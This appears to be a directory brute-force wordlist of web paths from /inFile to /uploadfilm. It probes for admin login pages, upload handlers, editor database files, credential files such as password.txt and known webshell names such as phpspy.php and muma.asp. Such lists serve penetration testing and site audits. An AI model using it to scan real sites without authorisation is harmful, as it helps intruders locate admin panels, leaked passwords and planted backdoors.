/inFile.php
/InFile/
/info
/info.asp
/info.aspx
/info.php
/info.txt
/infom_login.asp
/infom_login.aspx
/infom_login.php
/inforadmin.asp
/inforadmin.aspx
/inforadmin.php
/infos_admin/
/insert.asp
/insert.aspx
/insert.php
/InSide
/inside.asp
/inside.aspx
/inside.php
/inside/
/install.asp
/install.aspx
/install.php
/install/
/InTranet
/intranet.asp
/intranet.aspx
/intranet.php
/InTranet/
/irc-macadmin
/j
/j/
/job/
/joekoe_data.asp
/joekoe_data.aspx
/joekoe_data.php
/js.asp
/js.aspx
/js.php
/jswadmin.asp
/jswadmin.aspx
/jswadmin.php
/k
/k/
/kefu/
/Kes/
/Kes/Admin/Admin_Login.asp
/Kes/Admin/Admin_Login.aspx
/Kes/Admin/Admin_Login.php
/KesAdmin_Login.asp
/KesAdmin_Login.aspx
/KesAdmin_Login.php
/key.asp
/key.aspx
/key.php
/kfuser/
/kill.asa
/kill.asp
/kill.aspx
/kill.php
/KS_Data/
/kwadmin/
/kwadmin/A_Login.asp
/kwadmin/A_Login.aspx
/kwadmin/A_Login.php
/kycj/kycj/login.asp
/kycj/kycj/login.aspx
/kycj/kycj/login.php
/l
/l/
/l888/
/land.asp
/land.aspx
/land.php
/land/
/land/land.asp
/land/land.aspx
/land/land.php
/language/
/lavery_Edit/Admin_Login.asp
/lavery_Edit/Admin_Login.aspx
/lavery_Edit/Admin_Login.php
/law/
/left.asp
/left.aspx
/left.htm
/left.html
/left.php
/lennyash.asp
/lennyash.aspx
/lennyash.php
/les
/Les/
/lesb
/lesb/
/lesbian
/lesbian/
/lesbians
/lesbians/
/lesbo
/lesbo/
/lez
/lez/
/liaoxd.asp
/liaoxd.aspx
/liaoxd.php
/Library/
/Library/DbConnect.asp
/Library/DbConnect.aspx
/Library/DbConnect.php
/License.txt
/link
/link.asa
/link.asp
/link.aspx
/link.php
/link/
/Link/admin/
/link/admin_login.asp
/link/admin_login.aspx
/link/admin_login.php
/Link/link_admin/
/Link/login/
/Link/upload/upload.asp
/Link/upload/upload.aspx
/Link/upload/upload.php
/link_admin.asp
/link_admin.aspx
/link_admin.php
/links
/links.asp
/links.aspx
/links.php
/links/
/linkz
/linkz/
/list
/list.asp
/list.aspx
/list.php
/list/
/liuyan/
/liuyan/login.asp
/liuyan/login.aspx
/liuyan/login.php
/LiveUser_Admin
/Llyj/
/Local
/local.asp
/local.aspx
/local.php
/Local/
/localhost/
/localhostlogin.asp
/localhostlogin.aspx
/localhostlogin.php
/Log
/log.asp
/log.aspx
/Log.htm
/log.php
/Log/
/logger.asp
/logger.aspx
/logger.php
/logi.asp
/logi.aspx
/logi.php
/login
/login.asa
/login.asp
/login.aspx
/login.aspxx
/login.htm
/login.html
/login.jsp
/login.php
/login.phpx
/login/
/Login/Admin
/login/admin.asp
/login/admin.aspx
/login/admin.php
/login/admin/admin.asp
/login/admin/admin.aspx
/login/admin/admin.php
/login/Default.asp?
/login/Default.aspx?
/login/Default.php?
/login/index
/login/index.asp
/login/index.aspx
/login/index.php
/login/login
/login/login.asp
/login/login.aspx
/login/login.php
/login/logout.asp
/login/logout.aspx
/login/logout.php
/login/super
/login/super.asp
/login/super.aspx
/login/super.php
/login_A.html
/login_admin.asp
/login_admin.aspx
/login_admin.php
/login_admin/
/login_check.asp
/login_check.aspx
/login_check.php
/login_db
/login_Default.asp?
/login_Default.aspx?
/login_Default.php?
/login_form_admin.htm
/Login_From
/login_from.asp
/login_from.aspx
/login_from.php
/Login_From/
/login_in.asp
/login_in.aspx
/login_in.php
/login_manage.asp
/login_manage.aspx
/login_manage.php
/login_message.asp
/login_message.aspx
/login_message.php
/Login_ok.asp
/Login_ok.aspx
/Login_ok.php
/login_out.asp
/login_out.aspx
/login_out.php
/login_out/
/login1
/login1.asp
/login1.aspx
/login1.php
/login1/
/loginadmin.asp
/loginadmin.aspx
/loginadmin.php
/loginDefault.asp?
/loginDefault.aspx?
/loginDefault.php?
/loginerror.asp
/loginerror.aspx
/loginerror.php
/loginflat
/loginform.asp
/loginform.aspx
/loginform.php
/loginini.asp
/loginini.aspx
/loginini.php
/loginManage.asp
/loginManage.aspx
/loginManage.php
/loginok.asp
/loginok.aspx
/loginok.php
/LoginPage.do
/login-redirect
/loginsave.asp
/loginsave.aspx
/loginsave.php
/loginsuper.asp
/loginsuper.aspx
/loginsuper.php
/loginsys.asp
/loginsys.aspx
/loginsys.php
/login-us
/logn/
/logo.asp
/logo.aspx
/logo.php
/logo_sysadmin
/Logon
/logon.asp
/logon.aspx
/logon.php
/logout.asp
/logout.aspx
/logout.htm
/logout.html
/logout.php
/logout/
/logsys.asp
/logsys.aspx
/logsys.php
/LookupPass.asp
/LookupPass.aspx
/LookupPass.php
/lost
/lost/
/lostpass.asp
/lostpass.aspx
/lostpass.php
/Lotus_Domino_Admin
/love.asp
/love.aspx
/love.php
/lovebaobao.asp
/lovebaobao.aspx
/lovebaobao.php
/luck.asp
/luck.aspx
/luck.php
/lyb/
/lyb/admin_login.asp
/lyb/admin_login.aspx
/lyb/admin_login.php
/lyb/login.asp
/lyb/login.aspx
/lyb/login.php
/lygofa.asp
/lygofa.aspx
/lygofa.php
/lzwadmin/
/m
/m.asp
/m.aspx
/m.php
/m/
/m_login.asp
/m_login.aspx
/m_login.php
/ma.asp
/ma.aspx
/ma.php
/macadmin
/mail
/mail/
/maillist.mdb
/mails
/mails/
/Main
/main.asp
/main.aspx
/main.php
/main/
/main/login
/main/login.asp
/main/login.aspx
/main/login.php
/main1.as
/main1.asp
/main1.aspx
/main1.php
/mainframe.asp
/mainframe.aspx
/mainframe.php
/MainLogin
/MainTain
/maintain.asp
/maintain.aspx
/maintain.php
/MainTain/
/maintenance
/man.asp
/man.aspx
/man.php
/manage
/manage.asp
/manage.aspx
/manage.php
/manage/
/manage/admin.asp
/manage/admin.aspx
/manage/admin.php
/manage/admin_index.asp
/manage/admin_index.aspx
/manage/admin_index.php
/manage/admin_login.asp
/manage/admin_login.aspx
/manage/admin_login.php
/manage/AdminLogin.asp
/manage/AdminLogin.aspx
/manage/AdminLogin.php
/manage/Edit/admin_login.asp
/manage/Edit/admin_login.aspx
/manage/Edit/admin_login.php
/manage/Edit/db/ewebeditor.mdb
/manage/Editor/admin_login.asp
/manage/Editor/admin_login.aspx
/manage/Editor/admin_login.php
/manage/Editor/db/ewebeditor.mdb
/manage/eweb/admin_login.asp
/manage/eweb/admin_login.aspx
/manage/eweb/admin_login.php
/manage/eWeb/db/ewebeditor.mdb
/manage/eWebEditor/admin_login.asp
/manage/eWebEditor/admin_login.aspx
/manage/eWebEditor/admin_login.php
/manage/eWebEditor/db/ewebeditor.mdb
/manage/eWebEditor_v280_Free/admin_login.asp
/manage/eWebEditor_v280_Free/admin_login.aspx
/manage/eWebEditor_v280_Free/admin_login.php
/manage/eWebEditor_v280_Free/db/ewebeditor.mdb
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/manage/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/manage/FCKeditor/editor/filemanager/upload/test.html
/manage/htmedit/admin_login.asp
/manage/htmedit/admin_login.aspx
/manage/htmedit/admin_login.php
/manage/htmedit/db/ewebeditor.mdb
/manage/index.asp
/manage/index.aspx
/manage/index.php
/manage/login.asp
/manage/login.aspx
/manage/login.php
/manage/login/Login.asp
/manage/login/Login.aspx
/manage/login/Login.php
/manage/upfile.asp
/manage/upfile.aspx
/manage/upfile.php
/manage/WebEdit/admin_login.asp
/manage/WebEdit/admin_login.aspx
/manage/WebEdit/admin_login.php
/manage/WebEdit/db/ewebeditor.mdb
/manage/WebEditor/admin_login.asp
/manage/WebEditor/admin_login.aspx
/manage/WebEditor/admin_login.php
/manage/WebEditor/db/ewebeditor.mdb
/manage_admin/
/Manage_Auto/
/Manage_backup.asp
/Manage_backup.asp?action=Backup
/Manage_backup.aspx
/Manage_backup.aspx?action=Backup
/Manage_backup.php
/Manage_backup.php?action=Backup
/manage_index
/manage_index.asp
/manage_index.aspx
/manage_index.php
/manage_index/
/manage_login.asp
/manage_login.aspx
/manage_login.php
/manage_news/
/manage123/
/manage888/
/ManageAdmin/
/ManageLogin.asp
/ManageLogin.aspx
/ManageLogin.php
/management
/management/login.asp
/management/login.aspx
/management/login.php
/managenews/
/manager
/manager.asp
/manager.aspx
/manager.htm
/manager.php
/manager/
/manager/admin.asp
/manager/admin.aspx
/manager/admin.php
/manager/admin/admin_login.asp
/manager/admin/admin_login.aspx
/manager/admin/admin_login.php
/manager/admin_index.asp
/manager/admin_index.aspx
/manager/admin_index.php
/manager/admin_login.asp
/manager/admin_login.aspx
/manager/admin_login.php
/manager/index.asp
/manager/index.aspx
/manager/index.php
/manager/left.asp
/manager/left.aspx
/manager/left.php
/manager/login
/manager/login.asp
/manager/login.aspx
/manager/login.php
/manager/manager.asp
/manager/manager.aspx
/manager/manager.php
/manager/ndex.asp
/manager/ndex.aspx
/manager/ndex.php
/manager_admin/
/Manager_Login
/manager_login.asp
/manager_login.aspx
/manager_login.php
/Manager_Login/
/Managers
/managers.asp
/managers.aspx
/managers.php
/Managers/
/manages.asp
/manages.aspx
/manages.php
/manga
/manga/
/mangas
/mangas/
/manual
/manual.asp
/manual.aspx
/manual.php
/manual/
/manuallogin
/Master
/master.asp
/master.aspx
/master.php
/master/memmng/login.asp
/master/memmng/login.aspx
/master/memmng/login.php
/mba/
/md5.asp
/md5.aspx
/md5.php
/mdb.asp
/mdb.aspx
/mdb.php
/mem/login.asp
/mem/login.aspx
/mem/login.php
/member
/member.asp
/member.aspx
/member.php
/member/
/member/admin.asp
/member/admin.aspx
/member/admin.php
/member/login.asp
/member/login.aspx
/member/login.php
/member_download.asp
/member_download.aspx
/member_download.php
/member_list.asp
/member_list.aspx
/member_list.php
/MemberLogin
/memberlogin.asp
/memberlogin.aspx
/memberlogin.php
/MemberLogin/
/members
/members.asp
/members.aspx
/members.php
/members/
/members-only
/memlogin
/memmng/
/menu.asp
/menu.aspx
/menu.htm
/menu.html
/menu.php
/menu/
/messy
/messy/
/meta_login
/mg/Login.asp
/mg/Login.aspx
/mg/Login.php
/Mgr
/mgr.asp
/mgr.aspx
/mgr.php
/Mgr/
/mima.txt
/mirror
/mirror/
/mirrors
/mirrors/
/misc
/misc.asp
/misc.aspx
/misc.php
/misc/
/mm.asp
/mm.aspx
/mm.php
/Mmgr
/mmgr.asp
/mmgr.aspx
/mmgr.php
/Mmgr/
/mmm.asp
/mmm.aspx
/mmm.php
/mms/
/moban.asp
/moban.aspx
/moban.php
/mod
/mod/
/modelsearch/login.asp
/modelsearch/login.aspx
/modelsearch/login.php
/moderator
/moderator.asp
/moderator.aspx
/moderator.html
/moderator.php
/moderator/admin.asp
/moderator/admin.aspx
/moderator/admin.html
/moderator/admin.php
/moderator/login.asp
/moderator/login.aspx
/moderator/login.html
/moderator/login.php
/mods
/mods/
/module
/module/
/mon
/mon/
/monitor
/monitor/
/monitors
/monitors/
/more.asp
/more.aspx
/more.php
/movies
/movies/
/mrtg.asp
/mrtg.aspx
/mrtg.php
/Ms-admin/
/muma.asp
/muma.aspx
/muma.php
/my.asp
/my.aspx
/my.php
/myadmin
/myadmin.asp
/myadmin.aspx
/myadmin.php
/myadmin/
/Mybbs
/Mybbs/
/mybbssaveup.asp
/mybbssaveup.aspx
/mybbssaveup.php
/mydatazw/
/mylink.asp
/mylink.aspx
/mylink.php
/My-login.asp
/My-login.aspx
/My-login.php
/mymm.asp
/mymm.aspx
/mymm.php
/mystat/
/myup.asp
/myup.aspx
/myup.php
/mywebshell.asp
/mywebshell.aspx
/mywebshell.php
/n
/n/
/navSiteAdmin
/neeao.txt
/Neeao_sql_admin.asp
/Neeao_sql_admin.aspx
/Neeao_sql_admin.php
/Neeao_SqlIn.Asp
/Neeao_SqlIn.aspx
/Neeao_SqlIn.php
/net/
/new
/new.asp
/new.aspx
/new.php
/New/
/new/admin_index.asp
/new/admin_index.aspx
/new/admin_index.php
/new/Admin_New/default.asp
/new/Admin_New/default.aspx
/new/Admin_New/default.php
/NewAdmin
/newadmin.asp
/newadmin.aspx
/newadmin.php
/NewAdmin/
/Newbbs
/newbbs/
/newbbs/login
/newbbs/login.asp
/newbbs/login.aspx
/newbbs/login.php
/NewFile.txt
/newhome
/newhome/
/newmm.asp
/newmm.aspx
/newmm.php
/News
/news.asp
/news.aspx
/news.php
/news/
/news/admin/default.asp
/news/admin/default.aspx
/news/admin/default.php
/news/admin/upfile.asp
/news/admin/upfile.aspx
/news/admin/upfile.php
/news/admin_login.asp
/news/admin_login.aspx
/news/admin_login.php
/news/login.asp
/news/login.aspx
/news/login.php
/news/manage/login.asp
/news/manage/login.aspx
/news/manage/login.php
/news/newadmin/
/news/newadmin/test.asp
/news/newadmin/test.aspx
/news/newadmin/test.php
/News_Admin
/news_admin.asp
/news_admin.aspx
/news_admin.php
/News_Admin/
/news_list.asp
/news_list.aspx
/news_list.php
/news3000.asp
/news3000.aspx
/news3000.php
/newsadmin
/newsadmin.asp
/newsadmin.aspx
/newsadmin.php
/newsadmin/
/newsimage1.asp
/newsimage1.aspx
/newsimage1.php
/newslogin.htm.
/newsupfile.asp
/newsupfile.aspx
/newsupfile.php
/NewsUpLoad.asp
/NewsUpLoad.aspx
/NewsUpLoad.php
/NewWeb
/NewWeb/
/newz
/newz/
/o
/o/
/oask.asp
/oask.aspx
/oask.php
/Office
/office.asp
/office.aspx
/office.aspxx
/office.jsp
/office.php
/office.phpx
/Office/
/office/login.asp
/office/login.aspx
/office/login.php
/oh
/oh/
/Ok
/ok.asp
/ok.aspx
/ok.php
/Ok/
/ok_pass.asp
/ok_pass.aspx
/ok_pass.php
/old
/old/
/Oldbbs
/oldbbs/
/older
/older/
/oldies
/oldies/
/Oldweb
/Oldweb/
/open.asp
/open.asp.bak
/open.aspx
/open.aspx.bak
/open.php
/open.php.bak
/openvpnadmin
/organise.asp
/organise.aspx
/organise.php
/Other
/other.asp
/other.aspx
/other.php
/Other/
/p
/p/
/packet.mdb
/panel
/pass
/pass.asp
/pass.aspx
/pass.php
/pass.txt
/pass/
/passwd.asp
/passwd.aspx
/passwd.php
/password
/password.asp
/password.aspx
/password.php
/password.txt
/password/
/password_search.asp
/password_search.aspx
/password_search.php
/passwords
/passwords/
/passwordz
/passwordz/
/PayOnline/
/PBlog1.asp
/PBlog1.aspx
/PBlog1.php
/PBlog2.asp
/PBlog2.aspx
/PBlog2.php
/PBlog3.asp
/PBlog3.aspx
/PBlog3.php
/pers
/pers/
/perso
/perso/
/personnal
/personnal/
/pgadmin
/photo
/photo.asp
/photo.aspx
/photo.php
/photo/
/photos
/photos/
/photosave.asp
/photosave.aspx
/photosave.php
/php_Admin
/php_Admin/
/phpcmd.asp
/phpcmd.aspx
/phpcmd.php
/phpeditor/
/phpinfo.asp
/phpinfo.aspx
/phpinfo.php
/phpldapadmin
/phpmyadmin
/PhpMyAdmin/
/phppgadmin
/phpspy.asp
/phpspy.aspx
/phpspy.php
/phpSQLiteAdmin
/pic
/pic/
/picpost
/picpost/
/picposts
/picposts/
/pics
/pics/
/picture
/picture/
/pictures
/pictures/
/picturez
/picturez/
/picupload.asp
/picupload.aspx
/picupload.php
/picupsave.asp
/picupsave.aspx
/picupsave.php
/picupsave2.asp
/picupsave2.aspx
/picupsave2.php
/picz
/PJBLOG/
/platz_login
/play.asp
/play.aspx
/play.php
/popup.asp
/popup.aspx
/popup.htm
/popup.php
/post
/post/
/post_upfile.asp
/post_upfile.aspx
/post_upfile.php
/post_upload.asp
/post_upload.aspx
/post_upload.php
/power
/power/
/power_user
/ppbd.asp
/ppbd.aspx
/ppbd.php
/preview
/preview/
/PreviewImage/
/previews
/previews/
/previewz
/previewz/
/priv
/priv/
/private
/private.asp
/private.aspx
/private.php
/private/
/product
/Product/
/Product/Manage
/Product/Manage/
/Product/manage/login.asp
/Product/manage/login.aspx
/Product/manage/login.php
/products
/products/
/profile/
/profile/login.asp
/profile/login.aspx
/profile/login.php
/prog
/prog/
/program
/program.asp
/program.aspx
/program.php
/program/
/programming.asp
/programming.aspx
/programming.php
/programming/
/programs
/programs.asp
/programs.aspx
/programs.php
/programs/
/project/
/project/webpet/login.asp
/project/webpet/login.aspx
/project/webpet/login.php
/project-admins
/protect
/protect/
/protected
/protected/
/prv
/prv/
/pscms_admin/
/pub
/pub/
/public
/public.asp
/public.aspx
/public.php
/public/
/puppy
/puppy/
/pureadmin
/pwd
/pwd/
/pwds
/pwds/
/q
/q/
/qq.txt
/Qybz/
/qyjxy.asp
/qyjxy.aspx
/qyjxy.php
/qyml/upproduce.asp
/qyml/upproduce.aspx
/qyml/upproduce.php
/r
/r/
/radmind
/radmind-1
/rcLogin
/readme.asp
/readme.aspx
/readme.htm
/readme.html
/readme.php
/readme.txt
/Reg
/reg.asp
/reg.aspx
/reg.php
/Reg/
/reg_upload.asp
/reg_upload.aspx
/reg_upload.php
/reg_upload1.asp
/reg_upload1.aspx
/reg_upload1.php
/reg_user.asp
/reg_user.aspx
/reg_user.php
/Register
/register.asp
/register.aspx
/register.php
/Register/
/reload.asp
/reload.aspx
/reload.php
/report
/report/
/reports
/reports/
/review
/review/
/reviews
/reviews/
/robots.txt
/roha.asp
/roha.aspx
/roha.php
/Root
/root.asa
/root.asp
/root.aspx
/root.php
/root/
/root/login.asp
/root/login.aspx
/root/login.php
/rootceo.asp
/rootceo.aspx
/rootceo.php
/rss.asp
/rss.aspx
/rss.php
/rss1.asp
/rss1.aspx
/rss1.php
/rss2.asp
/rss2.aspx
/rss2.php
/rssfree.asp
/rssfree.aspx
/rssfree.php
/run
/run/
/s
/s/
/s_image.asp
/s_image.aspx
/s_image.htm
/s_image.php
/SAdmin
/sadmin.asp
/sadmin.aspx
/sadmin.php
/SAdmin/
/Saveannounce_upload.asp
/Saveannounce_upload.aspx
/Saveannounce_upload.php
/savecomment.asp
/savecomment.aspx
/savecomment.php
/savelogin.asp
/savelogin.aspx
/savelogin.php
/savemessage.asp
/savemessage.aspx
/savemessage.php
/saveup.asp
/saveup.aspx
/saveup.php
/saveupload.asp
/saveupload.aspx
/saveupload.php
/ScanShell.asp
/ScanShell.aspx
/ScanShell.php
/script
/script/
/scripts
/scripts/
/search.asp
/search.aspx
/search.php
/secret
/secret.asp
/secret.aspx
/secret.php
/secret/
/secrets
/secrets.asp
/secrets.aspx
/secrets.php
/secrets/
/secure
/secure/
/security
/security/
/Select_feedback.asp
/Select_feedback.aspx
/Select_feedback.php
/SEM_User/
/serial
/serial/
/serials
/serials/
/serialz
/serialz/
/Server
/Server.asp
/Server.aspx
/Server.html
/Server.php
/server_admin_small
/server_stats
/server_stats.asp
/server_stats.aspx
/server_stats.php
/server_stats/
/ServerAdministrator
/server-info.asp
/server-info.aspx
/server-info.php
/server-status.asp
/server-status.aspx
/server-status.php
/service
/service/
/services
/services/
/servu.asp
/servu.aspx
/servu.php
/set
/set.asp
/set.aspx
/set.php
/set/
/setting.asp
/setting.aspx
/setting.php
/setting/
/settings
/setup
/setup.asp
/setup.asp.bak
/setup.aspx
/setup.aspx.bak
/setup.php
/setup.php.bak
/setup/
/sever.asp
/sever.aspx
/sever.php
/sex
/sex/
/sexy
/sexy/
/shell.asp
/shell.aspx
/shell.php
/shemales
/shemales/
/shipin.asp
/shipin.aspx
/shipin.php
/shop/
/Shop/Admin
/Shop/Admin/
/Shop_Login.htm
/shopadmin/
/shopb2b_sysdata.asp
/shopb2b_sysdata.aspx
/shopb2b_sysdata.php
/show.asp
/show.aspx
/show.php
/show/
/Show/Back
/Show/Back/
/show/back/index.asp
/show/back/index.aspx
/show/back/index.php
/showimg.asp
/showimg.aspx
/showimg.php
/showlogin
/shownews.asp
/shownews.aspx
/shownews.php
/shtml
/shtml/
/simpleLogin
/Site
/site.asp
/site.aspx
/site.php
/site.rar
/Site/
/sitemap.xml
/sitemap/
/sjk2008/
/Skin/
/Skins/
/Skyj.asp
/Skyj.aspx
/Skyj.php
/SManager
/smanager.asp
/smanager.aspx
/smanager.php
/SManager/
/smblogin
/smhththt/
/snmp.asp
/snmp.aspx
/snmp.php
/soft_admin.asp
/soft_admin.aspx
/soft_admin.aspxx
/soft_admin.jsp
/soft_admin.php
/soft_admin.phpx
/solution
/solution/
/solutions
/solutions/
/source
/source.asp
/source.aspx
/source.php
/source/
/sources.asp
/sources.aspx
/sources.php
/sources/
/SouthidcEditor/
/spy.asp
/spy.aspx
/spy.php
/spzs/
/Sql
/sql.asp
/sql.aspx
/sql.php
/Sql/
/sql-admin
/SqlConf
/sqlconf.asp
/sqlconf.aspx
/sqlconf.php
/SqlConf/
/sqlin.asp
/sqlin.aspx
/sqlin.php
/ss_vms_admin_sm
/sshadmin
/st-admin/
/star.asp
/star.aspx
/star.php
/staradmin
/starark.asp 
/starark.aspx 
/starark.php 
/stat
/stat.asp
/stat.aspx
/stat.php
/stat/
/statistics
/statistics.asp
/statistics.aspx
/statistics.php
/statistics/
/stats
/Stats.asp
/Stats.aspx
/Stats.php
/Stats/
/stock/
/stock/login.asp
/stock/login.aspx
/stock/login.php
/Store
/store.asp
/store.aspx
/store.php
/Store/
/Stores
/Stores/
/Ststems
/ststems.asp
/ststems.aspx
/ststems.php
/ststems/
/stuff
/stuff/
/su.asp
/su.aspx
/su.php
/sub_upload.asp
/sub_upload.aspx
/sub_upload.php
/sub-login
/super
/super.asp
/super.aspx
/super.php
/super/
/super1.asp
/super1.aspx
/super1.php
/Super-Admin
/supervise
/supervise/
/supervise/Login.asp
/supervise/Login.aspx
/supervise/Login.php
/supervisor
/supervisor/
/SupplierAdm
/supplieradm.asp
/supplieradm.aspx
/supplieradm.php
/SupplierAdm/
/support
/support/
/support_login
/suzhijy/
/sxadmin/
/sxadmin/index.asp
/sxadmin/index.aspx
/sxadmin/index.php
/Sys
/sys.asp
/sys.aspx
/sys.php
/sys/
/sys//asjobcom/
/sys/admin/login.asp
/sys/admin/login.aspx
/sys/admin/login.php
/sys/login.asp
/sys/login.aspx
/sys/login.php
/sys/login/
/Sys_admin.asp
/Sys_admin.aspx
/Sys_admin.php
/sys_admin/
/Sys_Login
/sys_login.asp
/sys_login.aspx
/sys_login.php
/Sys_Login/
/sys_login_easysite.asp
/sys_login_easysite.aspx
/sys_login_easysite.php
/sys_manage/sys_index.asp
/sys_manage/sys_index.aspx
/sys_manage/sys_index.php
/sys_memu.asp
/sys_memu.aspx
/sys_memu.php
/sysadm_index.asp
/sysadm_index.aspx
/sysadm_index.php
/sysadm_login.asp
/sysadm_login.aspx
/sysadm_login.php
/SysAdmin
/sys-admin
/sysadmin.asp
/sysadmin.aspx
/sysadmin.html
/sysadmin.php
/SysAdmin/
/SysAdmin/login.asp
/SysAdmin/login.aspx
/SysAdmin/login.php
/SysAdmin2
/sysadmins
/sysadmins.asp
/sysadmins.aspx
/sysadmins.php
/SysAdmins/
/syscode.asp
/syscode.asp.bak
/syscode.aspx
/syscode.aspx.bak
/syscode.php
/syscode.php.bak
/syslog.asp
/syslog.aspx
/syslog.php
/syslogi.asp
/syslogi.aspx
/syslogi.php
/SysLogin
/syslogin.asp
/syslogin.aspx
/syslogin.php
/SysManage/
/SysManager
/SysManager/
/System
/system.asp
/system.aspx
/system.php
/System/
/system/default.asp
/system/default.aspx
/system/default.php
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.aspx
/system/FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.php
/system/FCKeditor/editor/filemanager/upload/test.html
/System/Function/UploadProductPic.asp
/System/Function/UploadProductPic.aspx
/System/Function/UploadProductPic.php
/system/index.asp
/system/index.aspx
/system/index.php
/System/Login
/system/login.asp
/system/login.aspx
/system/login.php
/system/login/
/system/manage.asp
/system/manage.aspx
/system/manage.php
/system/manage/index.asp
/system/manage/index.aspx
/system/manage/index.php
/system_admin/
/system_administration
/systemadmin/
/system-administration
/systemceo.asp
/systemceo.aspx
/systemceo.php
/systemroot.asp
/systemroot.aspx
/systemroot.php
/Systems
/systems.asp
/systems.aspx
/systems.php
/Systems/
/Systems/Login
/systems/login.asp
/systems/login.aspx
/systems/login.php
/systems/login/
/SysUser.asp
/SysUser.aspx
/SysUser.php
/sytle.asp
/sytle.aspx
/sytle.php
/szwyadmin/
/szwyadmin/login.asp
/szwyadmin/login.aspx
/szwyadmin/login.php
/t
/t/
/tab
/tab/
/tacforo/
/tacforo/admin_login.asp
/tacforo/admin_login.aspx
/tacforo/admin_login.php
/tb.asp
/tb.aspx
/tb.php
/teen
/teen/
/Teens
/Teens/
/teenz
/teenz/
/telephone
/telephone.asp
/telephone.aspx
/telephone.php
/telephone/
/temp
/temp.asp
/temp.aspx
/temp.php
/temp/
/temp_admin.asp
/temp_admin.aspx
/temp_admin.php
/temporary.asp
/temporary.aspx
/temporary.php
/Test
/test.asp
/test.asp.bak
/test.aspx
/test.aspx.bak
/test.php
/test.php.bak
/test.txt
/Test/
/test_download.asp
/test_download.aspx
/test_download.php
/test_page.asp
/test_page.aspx
/test_page.php
/test_upload.asp
/test_upload.aspx
/test_upload.php
/test1.asa
/test1.asp
/test1.aspx
/test1.php
/tester.asp
/tester.aspx
/tester.php
/tester_download.asp
/tester_download.aspx
/tester_download.php
/texteditor
/texteditor/
/thumb
/thumb/
/thumbs
/thumbs/
/thumbz
/thumbz/
/tiyisw.asp
/tiyisw.aspx
/tiyisw.php
/tjly.asp
/tjly.aspx
/tjly.php
/tmp
/tmp/
/today
/today/
/tongji/
/tool.asp
/tool.aspx
/tool.php
/tools.asp
/tools.aspx
/tools.php
/top
/top.asp
/top.aspx
/top.htm
/top.html
/top.php
/top/
/tot_dabase/
/toucher/
/toucher/admin_login.asp
/toucher/admin_login.aspx
/toucher/admin_login.php
/Trade
/Trade/
/Trade/Admin
/trade/admin/Login.asp
/trade/admin/Login.aspx
/trade/admin/Login.php
/tradeLogin.asp
/tradeLogin.aspx
/tradeLogin.php
/tryread/
/tryread/forbook1.asp   
/tryread/forbook1.aspx   
/tryread/forbook1.php   
/tungou/
/typo3
/u
/u/
/union//vip_manage/
/union/admin.asp
/union/admin.aspx
/union/admin.php
/up
/up.asp
/up.aspx
/up.php
/up/
/Up_BookPicPro.asp
/Up_BookPicPro.aspx
/Up_BookPicPro.php
/update
/update.asp
/update.aspx
/update.php
/update/
/update_user.asp
/update_user.aspx
/update_user.php
/UpdDate
/UpdDate/
/upfile.asp
/upfile.aspx
/upfile.php
/upfile/
/upfile_article.asp
/upfile_article.aspx
/upfile_article.php
/upfile_Dialog.asp
/upfile_Dialog.aspx
/upfile_Dialog.php
/upfile_flash.asp
/upfile_flash.aspx
/upfile_flash.php
/upfile_Other.asp
/upfile_Other.aspx
/upfile_Other.php
/upfile_photo.asp
/upfile_photo.aspx
/upfile_photo.php
/Upfile_pic.asp
/Upfile_pic.aspx
/Upfile_pic.php
/Upfile_pics.asp
/Upfile_pics.aspx
/Upfile_pics.php
/Upfile_Product.asp
/Upfile_Product.aspx
/Upfile_Product.php
/Upfile_ProductPic.asp
/Upfile_ProductPic.aspx
/Upfile_ProductPic.php
/upfile_soft.asp
/upfile_soft.aspx
/upfile_soft.php
/Upfile_SoftPic.asp
/Upfile_SoftPic.aspx
/Upfile_SoftPic.php
/upfile1.asp
/upfile1.aspx
/upfile1.php
/upfile2.asp
/upfile2.aspx
/upfile2.php
/upfile3.asp
/upfile3.aspx
/upfile3.php
/upfilea.asp
/upfilea.aspx
/upfilea.php
/Upfiledd.asp
/Upfiledd.aspx
/Upfiledd.php
/Upfilem.asp
/Upfilem.aspx
/Upfilem.php
/Upfilep.asp
/Upfilep.aspx
/Upfilep.php
/upfiles.asp
/upfiles.aspx
/upfiles.php
/upfilexinxi.asp
/upfilexinxi.aspx
/upfilexinxi.php
/upimg.asp
/upimg.aspx
/upimg.htm
/upimg.html
/upimg.php
/upl
/upl/
/Upload
/upload.asp
/upload.asp?action=upfile
/upload.aspx
/upload.aspx?action=upfile
/upload.htm
/upload.html
/upload.inc
/upload.php
/upload.php?action=upfile
/upload/
/upload/upload.asp
/upload/upload.aspx
/upload/upload.php
/upload_add.asp
/upload_add.aspx
/upload_add.htm
/upload_add.html
/upload_add.php
/upLoad_bm1.asp
/upLoad_bm1.aspx
/upLoad_bm1.php
/upload_browse.asp
/upload_browse.aspx
/upload_browse.php
/upLoad_c1.asp
/upLoad_c1.aspx
/upLoad_c1.php
/upload_flash.asp
/upload_flash.aspx
/upload_flash.php
/upload_flash_.asp
/upload_flash_.aspx
/upload_flash_.php
/upload_new_ad.asp
/upload_new_ad.aspx
/upload_new_ad.htm
/upload_new_ad.html
/upload_new_ad.php
/Upload_Photo.asp
/Upload_Photo.aspx
/Upload_Photo.php
/Upload_ProductPic.asp
/Upload_ProductPic.aspx
/Upload_ProductPic.php
/upload_soft.asp
/upload_soft.aspx
/upload_soft.php
/upload1.asp
/upload1.aspx
/upload1.php
/upload2.asp
/upload2.aspx
/upload2.php
/upload3.asp
/upload3.aspx
/upload3.php
/uploada.asp
/uploada.aspx
/uploada.php
/Uploaddd.asp
/Uploaddd.aspx
/Uploaddd.php
/UploadFace.asp
/UploadFace.aspx
/UploadFace.php
/UploadFace/
/uploadfaceok.asp
/uploadfaceok.aspx
/uploadfaceok.php
/UploadFile/
/uploadfiles.asp
/uploadfiles.aspx
/uploadfiles.php
/uploadfiles1.asp
/uploadfiles1.aspx
/uploadfiles1.php
/uploadfilm.asp
/uploadfilm.aspx
/uploadfilm.php
